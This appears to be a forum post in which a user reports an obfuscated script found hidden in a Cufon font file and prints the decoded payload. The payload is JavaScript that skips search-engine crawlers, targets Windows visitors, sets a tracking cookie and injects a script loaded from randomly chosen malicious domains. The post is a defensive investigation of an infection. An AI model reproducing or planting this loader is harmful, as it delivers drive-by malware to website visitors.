That writes a script tag into the document with the following payload:
var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()doms.length); var pref = Math.floor(Math.random()preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };
I'm thinking that this is malicious (a cursory search for emapis.org shows it to be a malware site)
I'm not super familiar with cufon but this does not appear to be kosher.
document.write(unescape(...giberrish...))
That writes a script tag into the document with the following payload:
var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()doms.length); var pref = Math.floor(Math.random()preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };
I'm thinking that this is malicious (a cursory search for emapis.org shows it to be a malware site)
I'm not super familiar with cufon but this does not appear to be kosher.
Here is a link that may prove useful http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpre...